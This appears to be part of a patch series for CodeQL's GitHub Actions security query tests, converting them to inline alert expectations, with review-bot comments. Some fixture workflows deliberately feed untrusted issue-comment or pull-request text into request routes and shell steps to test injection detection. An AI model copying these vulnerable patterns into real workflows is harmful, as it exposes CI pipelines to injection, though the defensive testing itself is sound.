| .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | -| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref index 9f17733e16e8..667c7a786389 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref @@ -1 +1,2 @@ -Security/CWE-829/UntrustedCheckoutCritical.ql +query: Security/CWE-829/UntrustedCheckoutCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref index 66b3f2cd9bf2..84af7bdc7237 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref @@ -1 +1,2 @@ -Security/CWE-829/UntrustedCheckoutHigh.ql +query: Security/CWE-829/UntrustedCheckoutHigh.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref index 55bb194f5ecd..1cb2407ccc7a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref 
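Review bot: The `postprocess: utils/test/InlineExpectationsTestQuery.ql` line added to UntrustedCheckoutCritical.qlref is also added to the High, Medium and UnversionedImmutableAction qlrefs in the hunks that follow, and all four tests sit in the same CWE-829 directory, so they presumably read the same `.github/workflows` fixtures. A bare `# $ Alert` in a shared fixture is an expectation for every one of these queries, so a line that only the Critical query flags would be reported as a missing result under the other three. The fixture annotations are outside this part of the patch, so this needs confirming there. Where the queries differ, the annotation should name its query, `# $ Alert[<query-id>]`, so that the tests keep pinning the severity split between Critical, High and Medium.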
@@ -1 +1,2 @@ -Security/CWE-829/UntrustedCheckoutMedium.ql +query: Security/CWE-829/UntrustedCheckoutMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref index 1887390c0f3d..e3d739264b2c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-829/UnversionedImmutableAction.ql +query: experimental/Security/CWE-829/UnversionedImmutableAction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml index 6937467453b2..849f1cdf8ec4 100644 --- a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml +++ b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml @@ -6,5 +6,5 @@ jobs: steps: - uses: octokit/request-action@v2 with: - route: ${{ github.event.comment.body }} + route: ${{ github.event.comment.body }} # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected index d980139bb357..5387cf2ebabb 100644 --- a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected +++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected 
@@ -1,6 +1,6 @@ +#select +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | edges nodes | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths -#select -| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref index 5479b022be0f..46eea075c3c3 100644 --- a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref +++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-918/RequestForgery.ql +query: experimental/Security/CWE-918/RequestForgery.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml index a8bfa4ae19a2..60f4b010f6d1 100644 --- a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml +++ b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml @@ -4,4 +4,4 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo ${{ github.event.pull_request.body}} + - run: echo ${{ github.event.pull_request.body}} # $ Alert 
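Review bot: The `# $ Alert` appended to the `run:` line of malformed.yml only matches if Debug/SyntaxError.ql reports the parse error on that exact line and if comments are still extracted from a file that fails to parse. The hunk shows only lines 4 to 7 of the fixture with the indentation lost, so neither can be checked here. Editing a fixture whose purpose is to be unparseable could also shift or remove the error it was written to trigger. If SyntaxError.expected gains missing-result or unexpected-result rows after this change, I would keep the fixture line as `- run: echo ${{ github.event.pull_request.body}}` and leave SyntaxError.qlref in its one-line form `Debug/SyntaxError.ql`.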
diff --git a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref index 97c5686103cf..f2bd2df19cbb 100644 --- a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref +++ b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref @@ -1 +1,2 @@ -Debug/SyntaxError.ql +query: Debug/SyntaxError.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml index 31f43d8b8b29..301de120d6f9 100644 --- a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml @@ -52,7 +52,7 @@ jobs: # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). # If this step fails, then you should remove it and run the build manually (see below) - - name: Autobuild + - name: Autobuild # $ Alert uses: github/codeql-action/autobuild@v3 # â„¹ï¸ Command-line programs to run using the OS shell. diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref index 75a8fe2398a6..1cdc74dec251 100644 --- a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref @@ -1 +1,2 @@ -Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql \ No newline at end of file +query: Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
From 27c62aa9b774078d21d2512cb71093791e53d90d Mon Sep 17 00:00:00 2001 
From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Thu, 11 Jun 2026 20:31:39 +0000 Subject: [PATCH 10/15] Fix ql inline expectation conversion recipe --- .../.github/workflows/reusable_workflow.yml | 10 +- .../Models/CompositeActionsSinks.expected | 6 +- .../Models/CompositeActionsSinks.qlref | 3 +- .../Models/CompositeActionsSources.expected | 12 +- .../Models/CompositeActionsSources.qlref | 4 +- .../Models/CompositeActionsSummaries.expected | 4 +- .../Models/CompositeActionsSummaries.qlref | 4 +- .../Models/ReusableWorkflowsSinks.expected | 4 +- .../Models/ReusableWorkflowsSinks.qlref | 4 +- .../Models/ReusableWorkflowsSources.expected | 4 +- .../Models/ReusableWorkflowsSources.qlref | 4 +- .../ReusableWorkflowsSummaries.expected | 4 +- .../Models/ReusableWorkflowsSummaries.qlref | 4 +- .../query-tests/Models/action1/action.yml | 16 +- .../CWE-074/.github/workflows/output1.yml | 8 +- .../CWE-074/.github/workflows/output2.yml | 18 +- .../CWE-074/OutputClobberingHigh.expected | 18 +- .../CWE-074/OutputClobberingHigh.qlref | 3 +- .../.github/workflows/artifactpoisoning51.yml | 4 +- .../.github/workflows/artifactpoisoning52.yml | 4 +- .../.github/workflows/artifactpoisoning53.yml | 4 +- .../CWE-077/.github/workflows/path1.yml | 18 +- .../CWE-077/.github/workflows/test10.yml | 4 +- .../CWE-077/.github/workflows/test11.yml | 4 +- .../CWE-077/.github/workflows/test12.yml | 8 +- .../CWE-077/.github/workflows/test13.yml | 4 +- .../CWE-077/.github/workflows/test14.yml | 4 +- .../CWE-077/.github/workflows/test15.yml | 4 +- .../CWE-077/.github/workflows/test16.yml | 6 +- .../CWE-077/.github/workflows/test2.yml | 4 +- .../CWE-077/.github/workflows/test3.yml | 4 +- .../CWE-077/.github/workflows/test4.yml | 36 +- .../CWE-077/.github/workflows/test5.yml | 4 +- .../CWE-077/.github/workflows/test6.yml | 12 +- .../CWE-077/.github/workflows/test7.yml | 4 +- .../CWE-077/.github/workflows/test8.yml | 8 +- .../CWE-077/.github/workflows/test9.yml | 4 +- 
.../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionCritical.qlref | 3 +- .../CWE-077/EnvPathInjectionMedium.expected | 2 +- .../CWE-077/EnvPathInjectionMedium.qlref | 3 +- .../CWE-077/EnvVarInjectionCritical.expected | 74 +- .../CWE-077/EnvVarInjectionCritical.qlref | 3 +- .../CWE-077/EnvVarInjectionMedium.expected | 2 +- .../CWE-077/EnvVarInjectionMedium.qlref | 3 +- .../.github/workflows/comment_issue.yml | 2 +- .../CWE-078/CommandInjectionCritical.expected | 4 +- .../CWE-078/CommandInjectionCritical.qlref | 3 +- .../CWE-078/CommandInjectionMedium.expected | 2 +- .../CWE-078/CommandInjectionMedium.qlref | 3 +- .../.github/workflows/arg_injection.yml | 26 +- .../ArgumentInjectionCritical.expected | 26 +- .../CWE-088/ArgumentInjectionCritical.qlref | 3 +- .../CWE-088/ArgumentInjectionMedium.expected | 2 +- .../CWE-088/ArgumentInjectionMedium.qlref | 3 +- .../.github/actions/action1/action.yml | 2 +- .../.github/actions/action3/action.yml | 2 +- .../.github/actions/action4/action.yml | 2 +- .../.github/actions/action5/action.yml | 6 +- .../.github/actions/action6/action.yml | 2 +- .../.github/actions/action7/action.yml | 8 +- .../.github/actions/clone-repo/action.yaml | 2 +- .../external/ultralytics/actions/action.yaml | 4 +- .../.github/workflows/argus_case_study.yml | 4 +- .../.github/workflows/artifactpoisoning1.yml | 4 +- .../.github/workflows/artifactpoisoning2.yml | 4 +- .../.github/workflows/artifactpoisoning3.yml | 4 +- .../.github/workflows/artifactpoisoning4.yml | 4 +- .../.github/workflows/artifactpoisoning5.yml | 4 +- .../.github/workflows/artifactpoisoning6.yml | 6 +- .../.github/workflows/artifactpoisoning7.yml | 4 +- .../.github/workflows/artifactpoisoning8.yml | 4 +- .../.github/workflows/changed-files.yml | 12 +- .../.github/workflows/comment_issue.yml | 14 +- .../workflows/comment_issue_newline.yml | 6 +- .../workflows/composite-action-caller-3.yml | 6 +- .../workflows/composite-action-caller-4.yml | 4 +- 
.../CWE-094/.github/workflows/cross3.yml | 6 +- .../CWE-094/.github/workflows/discussion.yml | 4 +- .../.github/workflows/discussion_comment.yml | 6 +- .../.github/workflows/publishResults.yml | 4 +- .../.github/workflows/reusable-workflow.yml | 10 +- .../CWE-094/.github/workflows/gollum.yml | 8 +- .../workflows/image_link_generator.yml | 4 +- .../CWE-094/.github/workflows/inter-job0.yml | 4 +- .../CWE-094/.github/workflows/inter-job1.yml | 4 +- .../CWE-094/.github/workflows/inter-job2.yml | 4 +- .../CWE-094/.github/workflows/inter-job4.yml | 4 +- .../CWE-094/.github/workflows/inter-job5.yml | 2 +- .../CWE-094/.github/workflows/issues.yaml | 16 +- .../CWE-094/.github/workflows/json_wrap.yml | 4 +- .../CWE-094/.github/workflows/level0.yml | 4 +- .../CWE-094/.github/workflows/level1.yml | 2 +- .../.github/workflows/priv_pull_request.yml | 2 +- .../.github/workflows/pull_request_review.yml | 16 +- .../workflows/pull_request_review_comment.yml | 16 +- .../.github/workflows/pull_request_target.yml | 16 +- .../CWE-094/.github/workflows/push.yml | 20 +- .../workflows/push_and_workflow_dispatch.yml | 20 +- .../.github/workflows/reusable-workflow-1.yml | 10 +- .../.github/workflows/reusable-workflow-2.yml | 10 +- .../workflows/reusable-workflow-caller-1.yml | 2 +- .../workflows/reusable-workflow-caller-2.yml | 2 +- .../workflows/reusable-workflow-caller-3.yml | 2 +- .../CWE-094/.github/workflows/self_needs.yml | 6 +- .../CWE-094/.github/workflows/simple1.yml | 4 +- .../CWE-094/.github/workflows/simple2.yml | 4 +- .../CWE-094/.github/workflows/simple3.yml | 4 +- .../.github/workflows/slash_command2.yml | 2 +- .../CWE-094/.github/workflows/test.yml | 4 +- .../CWE-094/.github/workflows/test1.yml | 4 +- .../CWE-094/.github/workflows/test10.yml | 12 +- .../CWE-094/.github/workflows/test11.yml | 6 +- .../CWE-094/.github/workflows/test12.yml | 2 +- .../CWE-094/.github/workflows/test13.yml | 8 +- .../CWE-094/.github/workflows/test14.yml | 16 +- 
.../CWE-094/.github/workflows/test15.yml | 16 +- .../CWE-094/.github/workflows/test16.yml | 8 +- .../CWE-094/.github/workflows/test17.yml | 16 +- .../CWE-094/.github/workflows/test18.yml | 4 +- .../CWE-094/.github/workflows/test19.yml | 84 +- .../CWE-094/.github/workflows/test2.yml | 8 +- .../CWE-094/.github/workflows/test20.yml | 2 +- .../CWE-094/.github/workflows/test21.yml | 6 +- .../CWE-094/.github/workflows/test24.yml | 4 +- .../CWE-094/.github/workflows/test25.yml | 4 +- .../CWE-094/.github/workflows/test26.yml | 6 +- .../CWE-094/.github/workflows/test27.yml | 4 +- .../CWE-094/.github/workflows/test29.yml | 2 +- .../CWE-094/.github/workflows/test3.yml | 4 +- .../CWE-094/.github/workflows/test4.yml | 6 +- .../CWE-094/.github/workflows/test5.yml | 2 +- .../CWE-094/.github/workflows/test7.yml | 8 +- .../CWE-094/.github/workflows/test8.yml | 4 +- .../CWE-094/.github/workflows/test9.yml | 12 +- .../.github/workflows/untrusted_checkout1.yml | 4 +- .../.github/workflows/workflow_run.yml | 16 +- .../workflows/workflow_run_branches1.yml | 2 +- .../workflows/workflow_run_branches2.yml | 2 +- .../workflows/workflow_run_branches3.yml | 2 +- .../workflows/workflow_run_branches4.yml | 2 +- .../workflows/workflow_run_branches5.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 334 +-- .../CWE-094/CodeInjectionCritical.qlref | 3 +- .../CWE-094/CodeInjectionMedium.expected | 118 +- .../CWE-094/CodeInjectionMedium.qlref | 3 +- .../CWE-1395/.github/workflows/test1.yml | 4 +- .../CWE-1395/UseOfKnownVulnerableAction.qlref | 4 +- .../CWE-200/.github/workflows/test1.yml | 2 +- .../CWE-200/SecretExfiltration.expected | 4 +- .../Security/CWE-200/SecretExfiltration.qlref | 4 +- .../CWE-275/.github/workflows/perms1.yml | 2 +- .../CWE-275/.github/workflows/perms10.yml | 2 +- .../CWE-275/.github/workflows/perms2.yml | 2 +- .../CWE-275/.github/workflows/perms5.yml | 2 +- .../CWE-275/.github/workflows/perms6.yml | 2 +- .../CWE-275/.github/workflows/perms7.yml | 2 +- 
.../CWE-275/.github/workflows/perms8.yml | 2 +- .../CWE-275/.github/workflows/perms9.yml | 2 +- .../CWE-275/MissingActionsPermissions.qlref | 4 +- .../CWE-284/.github/workflows/test1.yml | 16 +- .../CodeExecutionOnSelfHostedRunner.qlref | 4 +- .../CWE-285/.github/workflows/test1.yml | 2 +- .../CWE-285/ImproperAccessControl.qlref | 4 +- .../workflows/secrets-in-artifacts.yml | 10 +- .../CWE-312/.github/workflows/test1.yml | 10 +- .../CWE-312/ExcessiveSecretsExposure.qlref | 4 +- .../Security/CWE-312/SecretsInArtifacts.qlref | 4 +- .../CWE-312/UnmaskedSecretExposure.qlref | 4 +- .../.github/workflows/code_injection1.yml | 2 +- .../.github/workflows/direct_cache1.yml | 4 +- .../.github/workflows/direct_cache2.yml | 4 +- .../.github/workflows/direct_cache3.yml | 4 +- .../.github/workflows/direct_cache4.yml | 4 +- .../.github/workflows/direct_cache5.yml | 4 +- .../.github/workflows/direct_cache6.yml | 4 +- .../.github/workflows/poisonable_step1.yml | 10 +- .../.github/workflows/poisonable_step2.yml | 4 +- .../.github/workflows/poisonable_step3.yml | 2 +- .../.github/workflows/poisonable_step4.yml | 2 +- .../.github/workflows/poisonable_step5.yml | 4 +- .../CachePoisoningViaCodeInjection.expected | 4 +- .../CachePoisoningViaCodeInjection.qlref | 4 +- .../CachePoisoningViaDirectCache.expected | 14 +- .../CachePoisoningViaDirectCache.qlref | 4 +- .../CachePoisoningViaPoisonableStep.expected | 16 +- .../CachePoisoningViaPoisonableStep.qlref | 4 +- .../CWE-367/.github/workflows/comment.yml | 6 +- .../CWE-367/.github/workflows/test0.yml | 6 +- .../CWE-367/.github/workflows/test4.yml | 4 +- .../CWE-367/.github/workflows/test5.yml | 8 +- .../CWE-367/.github/workflows/test6.yml | 10 +- .../UntrustedCheckoutTOCTOUCritical.expected | 22 +- .../UntrustedCheckoutTOCTOUCritical.qlref | 3 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.qlref | 3 +- .../CWE-571/.github/workflows/test1.yml | 22 +- .../CWE-571/.github/workflows/test2.yml | 22 +- .../ExpressionIsAlwaysTrueCritical.qlref | 3 +- 
.../CWE-571/ExpressionIsAlwaysTrueHigh.qlref | 3 +- .../actions/dangerous-git-checkout/action.yml | 2 +- .../actions/download-artifact-2/action.yaml | 2 +- .../actions/download-artifact/action.yaml | 2 +- .../.github/actions/unpinned-tag/action.yml | 2 +- .../workflows/actor_trusted_checkout.yml | 4 +- .../workflows/artifactpoisoning101.yml | 6 +- .../.github/workflows/artifactpoisoning11.yml | 4 +- .../.github/workflows/artifactpoisoning12.yml | 4 +- .../.github/workflows/artifactpoisoning21.yml | 6 +- .../.github/workflows/artifactpoisoning22.yml | 6 +- .../.github/workflows/artifactpoisoning31.yml | 4 +- .../.github/workflows/artifactpoisoning32.yml | 4 +- .../.github/workflows/artifactpoisoning33.yml | 4 +- .../.github/workflows/artifactpoisoning34.yml | 4 +- .../.github/workflows/artifactpoisoning41.yml | 4 +- .../.github/workflows/artifactpoisoning42.yml | 4 +- .../.github/workflows/artifactpoisoning71.yml | 6 +- .../.github/workflows/artifactpoisoning81.yml | 4 +- .../.github/workflows/artifactpoisoning91.yml | 4 +- .../.github/workflows/artifactpoisoning92.yml | 6 +- .../.github/workflows/artifactpoisoning96.yml | 2 +- .../CWE-829/.github/workflows/auto_ci.yml | 18 +- .../CWE-829/.github/workflows/dependabot2.yml | 2 +- .../CWE-829/.github/workflows/dependabot3.yml | 4 +- .../TestRepo/.github/workflows/reusable.yml | 4 +- .../CWE-829/.github/workflows/gitcheckout.yml | 4 +- .../issue_comment_3rd_party_action.yml | 6 +- .../workflows/issue_comment_direct.yml | 10 +- .../workflows/issue_comment_heuristic.yml | 4 +- .../workflows/issue_comment_octokit.yml | 12 +- .../workflows/issue_comment_octokit2.yml | 8 +- .../workflows/label_trusted_checkout1.yml | 4 +- .../workflows/label_trusted_checkout2.yml | 6 +- .../CWE-829/.github/workflows/level0.yml | 10 +- .../CWE-829/.github/workflows/mend.yml | 4 +- .../CWE-829/.github/workflows/poc.yml | 8 +- .../CWE-829/.github/workflows/poc2.yml | 6 +- .../CWE-829/.github/workflows/poc3.yml | 2 +- 
.../CWE-829/.github/workflows/pr-workflow.yml | 44 +- .../workflows/priv_pull_request_checkout.yml | 2 +- .../.github/workflows/resolve-args.yml | 2 +- .../.github/workflows/reusable_local.yml | 4 +- .../CWE-829/.github/workflows/test10.yml | 4 +- .../CWE-829/.github/workflows/test11.yml | 4 +- .../CWE-829/.github/workflows/test12.yml | 2 +- .../CWE-829/.github/workflows/test13.yml | 4 +- .../CWE-829/.github/workflows/test14.yml | 4 +- .../CWE-829/.github/workflows/test15.yml | 4 +- .../CWE-829/.github/workflows/test17.yml | 6 +- .../CWE-829/.github/workflows/test18.yml | 6 +- .../CWE-829/.github/workflows/test22.yml | 2 +- .../CWE-829/.github/workflows/test25.yml | 4 +- .../CWE-829/.github/workflows/test27.yml | 4 +- .../CWE-829/.github/workflows/test28.yml | 2 +- .../CWE-829/.github/workflows/test29.yml | 4 +- .../CWE-829/.github/workflows/test3.yml | 2 +- .../CWE-829/.github/workflows/test4.yml | 2 +- .../CWE-829/.github/workflows/test7.yml | 12 +- .../CWE-829/.github/workflows/test8.yml | 2 +- .../CWE-829/.github/workflows/test9.yml | 2 +- .../.github/workflows/unpinned_tags.yml | 6 +- .../.github/workflows/untrusted_checkout.yml | 8 +- .../.github/workflows/untrusted_checkout2.yml | 2 +- .../.github/workflows/untrusted_checkout3.yml | 2 +- .../.github/workflows/untrusted_checkout4.yml | 8 +- .../workflow_run_untrusted_checkout.yml | 4 +- .../workflow_run_untrusted_checkout_2.yml | 4 +- .../ArtifactPoisoningCritical.expected | 38 +- .../CWE-829/ArtifactPoisoningCritical.qlref | 4 +- .../CWE-829/ArtifactPoisoningMedium.expected | 2 +- .../CWE-829/ArtifactPoisoningMedium.qlref | 4 +- .../ArtifactPoisoningPathTraversal.qlref | 4 +- .../Security/CWE-829/UnpinnedActionsTag.qlref | 3 +- .../UntrustedCheckoutCritical.expected | 80 +- .../CWE-829/UntrustedCheckoutCritical.qlref | 3 +- .../CWE-829/UntrustedCheckoutHigh.qlref | 3 +- .../CWE-829/UntrustedCheckoutMedium.qlref | 3 +- .../CWE-829/UnversionedImmutableAction.qlref | 3 +- .../CWE-918/.github/workflows/test.yml 
| 2 +- .../Security/CWE-918/RequestForgery.expected | 4 +- .../Security/CWE-918/RequestForgery.qlref | 3 +- .../.github/workflows/malformed.yml | 2 +- .../query-tests/SyntaxError/SyntaxError.qlref | 3 +- .../workflows/defaultable_workflow.yml | 2 +- .../UnnecessaryUseOfAdvancedConfig.qlref | 3 +- .../old.dbscheme | 2578 +++++++++++++++++ .../semmlecode.cpp.dbscheme | 2577 ++++++++++++++++ .../upgrade.properties | 2 + cpp/ql/lib/semmle/code/cpp/Type.qll | 2 +- cpp/ql/lib/semmlecode.cpp.dbscheme | 3 +- .../old.dbscheme | 2577 ++++++++++++++++ .../semmlecode.cpp.dbscheme | 2578 +++++++++++++++++ .../upgrade.properties | 2 + .../CWE/CWE-078/WordexpTainted.expected | 4 +- .../AllocMultiplicationOverflow.expected | 20 +- .../ArrayAccessProductFlow.expected | 38 +- .../ConstantSizeArrayOffByOne.expected | 44 +- .../tests/PrivateCleartextWrite.expected | 24 +- .../DecompressionBombs.expected | 28 +- .../name_qualifiers/NameQualifiers1.expected | 4 + .../Critical/MemoryFreed/DoubleFree.expected | 30 +- .../MemoryFreed/UseAfterFree.expected | 50 +- .../MissingCheckScanf.expected | 44 +- .../CastArrayPointerArithmetic.expected | 20 +- .../NonConstantFormat.expected | 40 +- .../ReturnStackAllocatedMemory.expected | 34 +- .../UsingExpiredStackAddress.expected | 56 +- .../RedundantNullCheckSimple.expected | 36 +- .../SAMATE/TaintedPath/TaintedPath.expected | 4 +- .../SAMATE/ExecTainted/ExecTainted.expected | 4 +- .../semmle/ExecTainted/ExecTainted.expected | 50 +- .../CWE/CWE-079/semmle/CgiXss/CgiXss.expected | 8 +- .../UncontrolledProcessOperation.expected | 4 +- .../UncontrolledProcessOperation.expected | 22 +- .../SAMATE/OverflowDestination.expected | 2 +- .../SAMATE/OverrunWriteProductFlow.expected | 32 +- .../CWE-119/SAMATE/UnboundedWrite.expected | 2 +- .../semmle/tests/OverflowDestination.expected | 10 +- .../semmle/tests/UnboundedWrite.expected | 6 +- .../semmle/tests/UnboundedWrite.expected | 12 +- .../ImproperArrayIndexValidation.expected | 4 +- 
.../ImproperArrayIndexValidation.expected | 10 +- .../SAMATE/UncontrolledFormatString.expected | 8 +- .../CWE-134/semmle/argv/argvLocal.expected | 50 +- .../semmle/consts/NonConstantFormat.expected | 48 +- .../CWE-134/semmle/funcs/funcsLocal.expected | 18 +- .../UncontrolledFormatString.expected | 12 +- .../CWE/CWE-134/semmle/ifs/ifs.expected | 24 +- .../CWE-190/SAMATE/ArithmeticTainted.expected | 4 +- .../SAMATE/ArithmeticUncontrolled.expected | 26 +- .../ArithmeticUncontrolled.expected | 56 +- .../TaintedAllocationSize.expected | 42 +- .../semmle/tainted/ArithmeticTainted.expected | 24 +- .../AuthenticationBypass.expected | 14 +- .../tests/CleartextBufferWrite.expected | 6 +- .../semmle/tests/CleartextFileWrite.expected | 32 +- .../tests/CleartextTransmission.expected | 82 +- .../CWE/CWE-319/UseOfHttp/UseOfHttp.expected | 14 +- .../CWE/CWE-326/InsufficientKeySize.expected | 8 +- .../tests/UseAfterFree/UseAfterFree.expected | 30 +- .../semmle/tests/UninitializedLocal.expected | 30 +- .../CWE-497/SAMATE/ExposedSystemData.expected 